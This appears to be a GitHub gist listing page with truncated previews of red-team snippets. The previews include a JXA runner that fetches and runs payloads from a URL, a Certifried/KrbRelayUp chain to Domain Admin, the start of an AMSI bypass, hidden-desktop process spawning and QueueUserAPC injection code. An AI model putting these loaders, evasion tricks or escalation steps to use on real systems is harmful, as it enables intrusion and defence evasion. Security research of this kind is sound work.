Skip to content

Instantly share code, notes, and snippets.

View thesubtlety's full-sized avatar

Noah thesubtlety

43 followers · 51 following
View GitHub Profile
@HackingLZ
HackingLZ / coalmine2.py
Last active March 5, 2024 00:13
coalmine2.py
#!/usr/bin/python3
import re
import zipfile
import argparse
from urllib.parse import urlparse
from colorama import Fore, Style, init
init()
@thesubtlety
thesubtlety / jxarun.swift
Last active September 10, 2023 19:25
Run jxa from file http stdin
// adapted from cedowns jxa-runner
import Foundation
import Cocoa
import OSAKit
//Usage:
// for hosted .js JXA payloads: ./JXARunner -u [url_to_jxa_payload]
// for local .js JXA payloads: ./JXARunner -f [path_to_jxa_payload]
// echo 'jxacode' | ./runner -s
@tothi
tothi / certifried_with_krbrelayup.md
Last active November 22, 2023 10:47
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.

Prerequisites:

@CCob
CCob / patchless_amsi.h
Created April 17, 2022 16:18
In-Process Patchless AMSI Bypass
#ifndef PATCHLESS_AMSI_H
#define PATCHLESS_AMSI_H
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
@SwitHak
SwitHak / 20211210-TLP-WHITE_LOG4J.md
Last active April 18, 2024 11:20
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
@Flangvik
Flangvik / PKI_Abuse_cheatsheet.md
Last active August 26, 2023 13:22
PKI Abuse CheatSheet
@Mr-Un1k0d3r
Mr-Un1k0d3r / run.c
Created August 11, 2021 18:07
spawn an invisible process
// To compile: gcc64.exe run.c -o run.exe
// To run: run.exe cmd.exe "/c whoami"
#include <Windows.h>
#include <stdio.h>
int main(int argc, char **argv) {
CHAR cDesktop[] = "hiddendesktop";
HDESK hDesk = CreateDesktop(cDesktop, NULL, NULL, DF_ALLOWOTHERACCOUNTHOOK, GENERIC_ALL, NULL);
@audibleblink
audibleblink / system32_exports.txt
Created March 18, 2021 17:43
This file has been truncated, but you can view the full file.
[*] - C:\Windows\System32\1028\VsGraphicsResources.dll
[?] 64-bit Image!
[>] Time Stamp: 12/31/1969 19:00:00
[>] Function Count:
[>] Named Functions:
[>] Ordinal Base:
[>] Function Array RVA: 0x
[>] Name Array RVA: 0x
@matterpreter
matterpreter / CallTreeToJSON.py
Last active April 29, 2023 12:06
Convert Ghidra Call Trees to JSON for Neo4j Ingestion
#@author matterpreter
#@category
#@keybinding
#@menupath
#@toolbar
###
# To import to Neo4j:
# CREATE CONSTRAINT function_name ON (n:Function) ASSERT n.name IS UNIQUE
#
@rvrsh3ll
rvrsh3ll / DInjectQueuerAPC.cs
Created November 20, 2020 15:10 — forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program